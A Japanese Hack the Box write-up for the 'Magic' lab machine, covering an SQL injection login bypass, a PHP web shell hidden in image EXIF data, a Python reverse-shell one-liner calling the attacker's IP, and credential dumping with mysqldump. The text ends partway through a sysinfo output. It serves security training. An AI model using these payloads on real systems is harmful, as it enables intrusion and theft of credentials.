Help us understand the problem. What is going on with this article?

【Hack the Box write-up】Magic

はじめに

筆者はHack the Box初心者です。
何か訂正や補足、アドバイスなどありましたら、コメントかTwitterまでお願いします。
さんぽし(@sanpo_shiho) | Twitter

cheat sheet

以下でcheat sheetとしてツールの使い方などをまとめています。参考にしてください。
github | sanposhiho/MY_CHEAT_SHEET

machineについて

難易度はmediumです
スクリーンショット 2020-05-30 20.22.54.png

mediumの中では簡単な方のmachineです

nmap

kali@kali:~$ nmap -sC -sV 10.10.10.185 -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-30 00:27 EDT
Nmap scan report for 10.10.10.185
Host is up (0.25s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.92 seconds

80番ポート

/index.php
スクリーンショット 2020-05-30 13.29.19.png

/login.php
スクリーンショット 2020-05-30 14.00.50.png

SQLiでlogin

loginの部分でusernameに'を入れるとlogin失敗とは違う動作をします(具体的にはloginフォームにそのまま戻ってくるという動きをします。

SQLiを疑って色々弄っていると

Burpでinterceptして以下のように書き換えます。

スクリーンショット 2020-05-30 14.02.23.png

これでinterceptをoffに切り替えると

スクリーンショット 2020-05-30 14.02.36.png

loginに成功します
何かしらの画像のupload画面が出ています

imageのexifにphpを埋め込み

SQLiからかなり詰まったのですが、

do you know an image can hide a lot of information? Maybe you just need the right tool.

Forumのこのコメントをみてやっとピンときました。(というのも先日Recruitのイベントで同様にexifを使う問題を見ていたので…)

$ exiftool -Comment='<?php system($_REQUEST['cmd']); ?>' test.png

これでcmdというqueryparamsを受け取り、shellに流すようにします。

imageはhoge.php.pngという形式でuploadします(png以外弾かれるようになっているので)

uploadされたimageがどこに行くのかgobusterで探します。

kali@kali:~$ gobuster dir -u http://10.10.10.185/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 40 -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.185/
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/05/30 03:48:33 Starting gobuster
===============================================================
/login.php (Status: 200)
/index.php (Status: 200)
/images (Status: 301)
/assets (Status: 301)
/upload.php (Status: 302)
/logout.php (Status: 302)
/purple.php (Status: 200)
/server-status (Status: 403)
===============================================================
2020/05/30 04:32:59 Finished
===============================================================
kali@kali:~$ gobuster dir -u http://10.10.10.185/images/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 40 -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.185/images/
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/05/30 04:33:45 Starting gobuster
===============================================================
/uploads (Status: 301)
===============================================================
2020/05/30 05:18:29 Finished
===============================================================

/images/uploadsが怪しいですね

先ほどの画面からuploadして

そしてこれ↓を

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

以下のようにURLエンコードしてアクセスすると

http://10.10.10.185/images/uploads/test.php.png?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.4%22,1212));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

シェルが取れます

kali@kali:~$ nc -lnvp 1212
listening on [any] 1212 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.185] 40024
/bin/sh: 0: can't access tty; job control turned off
$ 

userを獲得する

www-data@ubuntu:/$ cd /var/www/Magic
cd /var/www/Magic
www-data@ubuntu:/var/www/Magic$ ls
ls
assets   images     login.php   purple.php
db.php5  index.php  logout.php  upload.php
www-data@ubuntu:/var/www/Magic$ cat db.php5
cat db.php5
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

    private static $cont  = null;

    public function __construct() {
        die('Init function is not allowed');
    }

    public static function connect()
    {
        // One connection through whole application
        if ( null == self::$cont )
        {
            try
            {
                self::$cont =  new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
            }
            catch(PDOException $e)
            {
                die($e->getMessage());
            }
        }
        return self::$cont;
    }

    public static function disconnect()
    {
        self::$cont = null;
    }
}

よくあるDB覗くパターンかーと思ったら単純なmysqlコマンドは使用できませんでした

www-data@ubuntu:/var/www/Magic$ ls -la /usr/bin/ | grep mysql
ls -la /usr/bin/ | grep mysql
-rwxr-xr-x  1 root root     3627200 Jan 21 06:10 mysql_config_editor
-rwxr-xr-x  1 root root    22558552 Jan 21 06:10 mysql_embedded
-rwxr-xr-x  1 root root     5179616 Jan 21 06:10 mysql_install_db
-rwxr-xr-x  1 root root     3616952 Jan 21 06:10 mysql_plugin
-rwxr-xr-x  1 root root     3784424 Jan 21 06:10 mysql_secure_installation
-rwxr-xr-x  1 root root     3653288 Jan 21 06:10 mysql_ssl_rsa_setup
-rwxr-xr-x  1 root root     3569976 Jan 21 06:10 mysql_tzinfo_to_sql
-rwxr-xr-x  1 root root     4442320 Jan 21 06:10 mysql_upgrade
-rwxr-xr-x  1 root root     3799752 Jan 21 06:10 mysqladmin
lrwxrwxrwx  1 root root          10 Jan 21 06:10 mysqlanalyze -> mysqlcheck
-rwxr-xr-x  1 root root     4068280 Jan 21 06:10 mysqlbinlog
-rwxr-xr-x  1 root root     3825320 Jan 21 06:10 mysqlcheck
-rwxr-xr-x  1 root root       26952 Jan 21 06:10 mysqld_multi
-rwxr-xr-x  1 root root       28448 Jan 21 06:10 mysqld_safe
-rwxr-xr-x  1 root root     3875176 Jan 21 06:10 mysqldump
-rwxr-xr-x  1 root root        7865 Jan 21 06:10 mysqldumpslow
-rwxr-xr-x  1 root root     3791912 Jan 21 06:10 mysqlimport
lrwxrwxrwx  1 root root          10 Jan 21 06:10 mysqloptimize -> mysqlcheck
-rwxr-xr-x  1 root root     4286120 Jan 21 06:10 mysqlpump
lrwxrwxrwx  1 root root          10 Jan 21 06:10 mysqlrepair -> mysqlcheck
-rwxr-xr-x  1 root root       39016 Jan 12  2018 mysqlreport
-rwxr-xr-x  1 root root     3790504 Jan 21 06:10 mysqlshow
-rwxr-xr-x  1 root root     3809512 Jan 21 06:10 mysqlslap
www-data@ubuntu:/var/www/Magic$ 

見てみるとmysqldumpなら使えそうです

www-data@ubuntu:/var/www/Magic$ mysqldump --databases Magic -utheseus -piamkingtheseus
<qldump --databases Magic -utheseus -piamkingtheseus
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- MySQL dump 10.13  Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost    Database: Magic
-- ------------------------------------------------------
-- Server version       5.7.29-0ubuntu0.18.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Current Database: `Magic`
--

CREATE DATABASE /*!32312 IF NOT EXISTS*/ `Magic` /*!40100 DEFAULT CHARACTER SET latin1 */;

USE `Magic`;

--
-- Table structure for table `login`
--

DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
  `id` int(6) NOT NULL AUTO_INCREMENT,
  `username` varchar(50) NOT NULL,
  `password` varchar(100) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `username` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2020-05-29 23:43:16

INSERT INTOloginVALUES (1,'admin','Th3s3usW4sK1ng');が怪しいですね

www-data@ubuntu:/var/www/Magic$ su theseus
su theseus
Password: Th3s3usW4sK1ng

theseus@ubuntu:/var/www/Magic$

theseusに昇格できました。これでuserが取れます

PE

SUIDなファイルを探します

theseus@ubuntu:~$  find / -perm -u=s -type f 2>/dev/null
 find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/arping
/usr/bin/vmware-user-suid-wrapper
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/snapd/snap-confine
/snap/core18/1223/bin/mount
/snap/core18/1223/bin/ping
/snap/core18/1223/bin/su
/snap/core18/1223/bin/umount
/snap/core18/1223/usr/bin/chfn
/snap/core18/1223/usr/bin/chsh
/snap/core18/1223/usr/bin/gpasswd
/snap/core18/1223/usr/bin/newgrp
/snap/core18/1223/usr/bin/passwd
/snap/core18/1223/usr/bin/sudo
/snap/core18/1223/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1223/usr/lib/openssh/ssh-keysign
/snap/core18/1668/bin/mount
/snap/core18/1668/bin/ping
/snap/core18/1668/bin/su
/snap/core18/1668/bin/umount
/snap/core18/1668/usr/bin/chfn
/snap/core18/1668/usr/bin/chsh
/snap/core18/1668/usr/bin/gpasswd
/snap/core18/1668/usr/bin/newgrp
/snap/core18/1668/usr/bin/passwd
/snap/core18/1668/usr/bin/sudo
/snap/core18/1668/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1668/usr/lib/openssh/ssh-keysign
/snap/core/8689/bin/mount
/snap/core/8689/bin/ping
/snap/core/8689/bin/ping6
/snap/core/8689/bin/su
/snap/core/8689/bin/umount
/snap/core/8689/usr/bin/chfn
/snap/core/8689/usr/bin/chsh
/snap/core/8689/usr/bin/gpasswd
/snap/core/8689/usr/bin/newgrp
/snap/core/8689/usr/bin/passwd
/snap/core/8689/usr/bin/sudo
/snap/core/8689/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8689/usr/lib/openssh/ssh-keysign
/snap/core/8689/usr/lib/snapd/snap-confine
/snap/core/8689/usr/sbin/pppd
/snap/core/7917/bin/mount
/snap/core/7917/bin/ping
/snap/core/7917/bin/ping6
/snap/core/7917/bin/su
/snap/core/7917/bin/umount
/snap/core/7917/usr/bin/chfn
/snap/core/7917/usr/bin/chsh
/snap/core/7917/usr/bin/gpasswd
/snap/core/7917/usr/bin/newgrp
/snap/core/7917/usr/bin/passwd
/snap/core/7917/usr/bin/sudo
/snap/core/7917/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7917/usr/lib/openssh/ssh-keysign
/snap/core/7917/usr/lib/snapd/snap-confine
/snap/core/7917/usr/sbin/pppd
/bin/umount
/bin/fusermount
/bin/sysinfo
/bin/mount
/bin/su
/bin/ping

んーーー?

sysinfoに着目する

これまたforumからヒントを持ってきたのですが、sysinfoなんてコマンドありそうでないですよね?
なのでこれはcustomされたコマンドということになります。

root@ubuntu:/tmp# sysinfo
sysinfo
====================Hardware Info====================
H/W path           Device      Class      Description
=====================================================
                               system     VMware Virtual Platform
/0                             bus        440BX Desktop Reference Platform
/0/0                           memory     86KiB BIOS
/0/1                           processor  AMD EPYC 7401P 24-Core Processor
/0/1/0                         memory     16KiB L1 cache
/0/1/1                         memory     16KiB L1 cache
/0/1/2                         memory     512KiB L2 cache
/0/1/3                         memory     512KiB L2 cache
/0/2                           processor  AMD EPYC 7401P 24-Core Processor
/0/28                          memory     System Memory
/0/28/0                        memory     4GiB DIMM DRAM EDO
/0/28/1                        memory     DIMM DRAM [empty]
/0/28/2                        memory     DIMM DRAM [empty]
/0/28/3                        memory     DIMM DRAM [empty]
/0/28/4                        memory     DIMM DRAM [empty]
/0/28/5                        memory     DIMM DRAM [empty]
/0/28/6                        memory     DIMM DRAM [empty]
/0/28/7                        memory     DIMM DRAM [empty]
/0/28/8                        memory     DIMM DRAM [empty]
/0/28/9                        memory     DIMM DRAM [empty]
/0/28/a                        memory     DIMM DRAM [empty]
/0/28/b                        memory     DIMM DRAM [empty]
/0/28/c                        memory     DIMM DRAM [empty]
/0/28/d                        memory     DIMM DRAM [empty]
/0/28/e                        memory     DIMM DRAM [empty]
/0/28/f                        memory     DIMM DRAM [empty]
/0/28/10                       memory     DIMM DRAM [empty]
/0/28/11                       memory     DIMM DRAM [empty]
/0/28/12                       memory     DIMM DRAM [empty]
/0/28/13                       memory     DIMM DRAM [empty]
/0/28/14                       memory     DIMM DRAM [empty]
/0/28/15                       memory     DIMM DRAM [empty]
/0/28/16                       memory     DIMM DRAM [empty]
/0/28/17                       memory     DIMM DRAM [empty]
/0/28/18                       memory     DIMM DRAM [empty]
/0/28/19                       memory     DIMM DRAM [empty]
/0/28/1a                       memory     DIMM DRAM [empty]
/0/28/1b                       memory     DIMM DRAM [empty]
/0/28/1c                       memory     DIMM DRAM [empty]
/0/28/1d                       memory     DIMM DRAM [empty]
/0/28/1e                       memory     DIMM DRAM [empty]
/0/28/1f                       memory     DIMM DRAM [empty]
/0/28/20                       memory     DIMM DRAM [empty]
/0/28/21                       memory     DIMM DRAM [empty]
/0/28/22                       memory     DIMM DRAM [empty]
/0/28/23                       memory     DIMM DRAM [empty]
/0/28/24                       memory     DIMM DRAM [empty]
/0/28/25                       memory     DIMM DRAM [empty]
/0/28/26                       memory     DIMM DRAM [empty]
/0/28/27                       memory     DIMM DRAM [empty]
/0/28/28                       memory     DIMM DRAM [empty]
/0/28/29                       memory     DIMM DRAM [empty]
/0/28/2a                       memory     DIMM DRAM [empty]
/0/28/2b                       memory     DIMM DRAM [empty]
/0/28/2c                       memory     DIMM DRAM [empty]
/0/28/2d                       memory     DIMM DRAM [empty]
/0/28/2e                       memory     DIMM DRAM [empty]
/0/28/2f                       memory     DIMM DRAM [empty]
/0/28/30                       memory     DIMM DRAM [empty]
/0/28/31                       memory     DIMM DRAM [empty]
/0/28/32                       memory     DIMM DRAM [empty]
/0/28/33                       memory     DIMM DRAM [empty]
/0/28/34                       memory     DIMM DRAM [empty]
/0/28/35                       memory     DIMM DRAM [empty]
/0/28/36                       memory     DIMM DRAM [empty]
/0/28/37                       memory     DIMM DRAM [empty]
/0/28/38                       memory     DIMM DRAM [empty]
/0/28/39                       memory     DIMM DRAM [empty]
/0/28/3a                       memory     DIMM DRAM [empty]
/0/28/3b                       memory     DIMM DRAM [empty]
/0/28/3c                       memory     DIMM DRAM [empty]
/0/28/3d                       memory     DIMM DRAM [empty]
/0/28/3e                       memory     DIMM DRAM [empty]
/0/28/3f                       memory     DIMM DRAM [empty]
/0/3                           memory     
/0/3/0                         memory     DIMM [empty]
/0/4                           memory     
/0/4/0                         memory     DIMM [empty]
/0/5                           memory     
/0/5/0                         memory     DIMM [empty]
/0/6                           memory     
/0/6/0                         memory     DIMM [empty]
/0/7                           memory     
/0/7/0                         memory     DIMM [empty]
/0/8                           memory     
/0/8/0                         memory     DIMM [empty]
/0/9                           memory     
/0/9/0                         memory     DIMM [empty]
/0/a                           memory     
/0/a/0                         memory     DIMM [empty]
/0/b                           memory     
/0/b/0                         memory     DIMM [empty]
/0/c                           memory     
/0/c/0                         memory     DIMM [empty]
/0/d                           memory     
/0/d/0                         memory     DIMM [empty]
/0/e                           memory     
/0/e/0                         memory     DIMM [empty]
/0/f                           memory     
/0/f/0                         memory     DIMM [empty]
/0/10                          memory     
/0/10/0                        memory     DIMM [empty]
/0/11                          memory     
/0/11/0                        memory     DIMM [empty]
/0/12                          memory     
/0/12/0                        memory     DIMM [empty]
/0/13                          memory     
/0/13/0                        memory     DIMM [empty]
/0/14                          memory     
/0/14/0                        memory     DIMM [empty]
/0/15                          memory     
/0/15/0                        memory     DIMM [empty]
/0/16                          memory     
/0/16/0                        memory     DIMM [empty]
/0/17                          memory     
/0/17/0                        memory     DIMM [empty]
/0/18                          memory     
/0/18/0                        memory     DIMM [empty]
/0/19                          memory     
/0/19/0                        memory     DIMM [empty]
/0/1a                          memory     
/0/1a/0                        memory     DIMM [empty]
/0/1b                          memory     
/0/1b/0                        memory     DIMM [empty]
/0/1c                          memory     
/0/1c/0                        memory     DIMM [empty]
/0/1d                          memory     
/0/1d/0                        memory     DIMM [empty]
/0/1e                          memory     
/0/1e/0                        memory     DIMM [empty]
/0/1f                          memory     
/0/1f/0                        memory     DIMM [empty]
/0/20                          memory     
/0/20/0                        memory     DIMM [empty]
/0/21                          memory     
/0/21/0                        memory     DIMM [empty]
/0/22                          memory     
/0/22/0                        memory     DIMM [empty]
/0/23                          memory     
/0/23/0                        memory     DIMM [empty]
/0/24                          memory     
/0/24/0                        memory     DIMM [empty]
/0/25                          memory     
/0/25/0                        memory     DIMM [empty]
/0/26                          memory     
/0/26/0                        memory     DIMM [empty]
/0/27                          memory     
/0/27/0                        memory     DIMM [empty]
/0/29                          memory     
/0/29/0                        memory     DIMM [empty]
/0/2a                          memory     
/0/2a/0                        memory     DIMM [empty]
/0/2b                          memory     
/0/2b/0                        memory     DIMM [empty]
/0/2c                          memory     
/0/2c/0                        memory     DIMM [empty]
/0/2d                          memory     
/0/2d/0                        memory     DIMM [empty]
/0/2e                          memory     
/0/2e/0                        memory     DIMM [empty]
/0/2f                          memory     
/0/2f/0                        memory     DIMM [empty]
/0/30                          memory     
/0/30/0                        memory     DIMM [empty]
/0/31                          memory     
/0/31/0                        memory     DIMM [empty]
/0/32                          memory     
/0/32/0                        memory     DIMM [empty]
/0/33                          memory     
/0/33/0                        memory     DIMM [empty]
/0/34                          memory     
/0/34/0                        memory     DIMM [empty]
/0/35                          memory     
/0/35/0                        memory     DIMM [empty]
/0/36                          memory     
/0/36/0                        memory     DIMM [empty]
/0/37                          memory     
/0/37/0                        memory     DIMM [empty]
/0/38                          memory     
/0/38/0                        memory     DIMM [empty]
/0/39                          memory     
/0/39/0                        memory     DIMM [empty]
/0/3a                          memory     
/0/3a/0                        memory     DIMM [empty]
/0/3b                          memory     
/0/3b/0                        memory     DIMM [empty]
/0/3c                          memory     
/0/3c/0                        memory     DIMM [empty]
/0/3d                          memory     
/0/3d/0                        memory     DIMM [empty]
/0/3e                          memory     
/0/3e/0                        memory     DIMM [empty]
/0/3f                          memory     
/0/3f/0                        memory     DIMM [empty]
/0/40                          memory     
/0/40/0                        memory     DIMM [empty]
/0/41                          memory     
/0/41/0                        memory     DIMM [empty]
/0/42                          memory     
/0/42/0                        memory     DIMM [empty]
/0/43                          memory     
/0/43/0                        memory     DIMM [empty]
/0/44                          memory     
/0/45                          memory     
/0/100                         bridge     440BX/ZX/DX - 82443BX/ZX/DX Host bridge
/0/100/1                       bridge     440BX/ZX/DX - 82443BX/ZX/DX AGP bridge
/0/100/7                       bridge     82371AB/EB/MB PIIX4 ISA
/0/100/7.1                     storage    82371AB/EB/MB PIIX4 IDE
/0/100/7.3                     bridge     82371AB/EB/MB PIIX4 ACPI
/0/100/7.7                     generic    Virtual Machine Communication Interface
/0/100/f                       display    SVGA II Adapter
/0/100/10          scsi2       storage    53c1030 PCI-X Fusion-MPT Dual Ultra320 SCSI
/0/100/10/0.0.0    /dev/sda    disk       21GB Virtual disk
/0/100/10/0.0.0/1  /dev/sda1   volume     19GiB EXT4 volume
/0/100/11                      bridge     PCI bridge
/0/100/11/0                    bus        USB1.1 UHCI Controller
/0/100/11/0/1      usb2        bus        UHCI Host Controller
/0/100/11/0/1/1                input      VMware Virtual USB Mouse
/0/100/11/0/1/2                bus        VMware Virtual USB Hub
/0/100/11/1                    bus        USB2 EHCI Controller
/0/100/11/1/1      usb1        bus        EHCI Host Controller
/0/100/15                      bridge     PCI Express Root Port
/0/100/15/0        ens160      network    VMXNET3 Ethernet Controller
/0/100/15.1                    bridge     PCI Express Root Port
/0/100/15.2                    bridge     PCI Express Root Port
/0/100/15.3                    bridge     PCI Express Root Port
/0/100/15.4                    bridge     PCI Express Root Port
/0/100/15.5                    bridge     PCI Express Root Port
/0/100/15.6                    bridge     PCI Express Root Port
/0/100/15.7                    bridge     PCI Express Root Port
/0/100/16                      bridge     PCI Express Root Port
/0/100/16.1                    bridge     PCI Express Root Port
/0/100/16.2                    bridge     PCI Express Root Port
/0/100/16.3                    bridge     PCI Express Root Port
/0/100/16.4                    bridge     PCI Express Root Port
/0/100/16.5                    bridge     PCI Express Root Port
/0/100/16.6                    bridge     PCI Express Root Port
/0/100/16.7                    bridge     PCI Express Root Port
/0/100/17                      bridge     PCI Express Root Port
/0/100/17.1                    bridge     PCI Express Root Port
/0/100/17.2                    bridge     PCI Express Root Port
/0/100/17.3                    bridge     PCI Express Root Port
/0/100/17.4                    bridge     PCI Express Root Port
/0/100/17.5                    bridge     PCI Express Root Port
/0/100/17.6                    bridge     PCI Express Root Port
/0/100/17.7                    bridge     PCI Express Root Port
/0/100/18                      bridge     PCI Express Root Port
/0/100/18.1                    bridge     PCI Express Root Port
/0/100/18.2                    bridge     PCI Express Root Port
/0/100/18.3                    bridge     PCI Express Root Port
/0/100/18.4                    bridge     PCI Express Root Port
/0/100/18.5                    bridge     PCI Express Root Port
/0/100/18.6                    bridge     PCI Express Root Port
/0/100/18.7                    bridge     PCI Express Root Port
/0/46              scsi0       storage    
/0/46/0.0.0        /dev/cdrom  disk       VMware IDE CDR00
/1                             system     

====================Disk Info====================
Disk /dev/loop0: 44.9 MiB, 47063040 bytes, 91920 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop1: 3.7 MiB, 3825664 bytes, 7472 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop2: 3.7 MiB, 3862528 bytes, 7544 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop3: 89.1 MiB, 93454336 bytes, 182528 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop4: 44.2 MiB, 46325760 bytes, 90480 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop5: 956 KiB, 978944 bytes, 1912 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop6: 54.7 MiB, 57294848 bytes, 111904 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop7: 160.2 MiB, 167931904 bytes, 327992 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes






Disk /dev/sda: 20 GiB, 21474836480 bytes, 41943040 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x44c94251

Device     Boot Start      End  Sectors Size Id Type
/dev/sda1  *     2048 41940991 41938944  20G 83 Linux


Disk /dev/loop8: 91.4 MiB, 95805440 bytes, 187120 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop9: 956 KiB, 978944 bytes, 1912 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop10: 54.5 MiB, 57151488 bytes, 111624 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop11: 149.9 MiB, 157192192 bytes, 307016 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

====================CPU Info====================
processor       : 0
vendor_id       : AuthenticAMD
cpu family      : 23
model           : 1
model name      : AMD EPYC 7401P 24-Core Processor
stepping        : 2
microcode       : 0x8001230
cpu MHz         : 2000.000
cache size      : 512 KB
physical id     : 0
siblings        : 1
core id         : 0
cpu cores       : 1
apicid          : 0
initial apicid  : 0
fpu             : yes
fpu_exception   : yes
cpuid level     : 13
wp              : yes
flags           : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ssbd ibpb vmmcall fsgsbase bmi1 avx2 smep bmi2 rdseed adx smap clflushopt sha_ni xsaveopt xsavec xsaves clzero arat overflow_recov succor
bugs            : fxsave_leak sysret_ss_attrs null_seg spectre_v1 spectre_v2 spec_store_bypass
bogomips        : 4000.00
TLB size        : 2560 4K pages
clflush size    : 64
cache_alignment : 64
address sizes   : 43 bits physical, 48 bits virtual
power management:

processor       : 1
vendor_id       : AuthenticAMD
cpu family      : 23
model           : 1
model name      : AMD EPYC 7401P 24-Core Processor
stepping        : 2
microcode       : 0x8001230
cpu MHz         : 2000.000
cache size      : 512 KB
physical id     : 2
siblings        : 1
core id         : 0
cpu cores       : 1
apicid          : 2
initial apicid  : 2
fpu             : yes
fpu_exception   : yes
cpuid level     : 13
wp              : yes
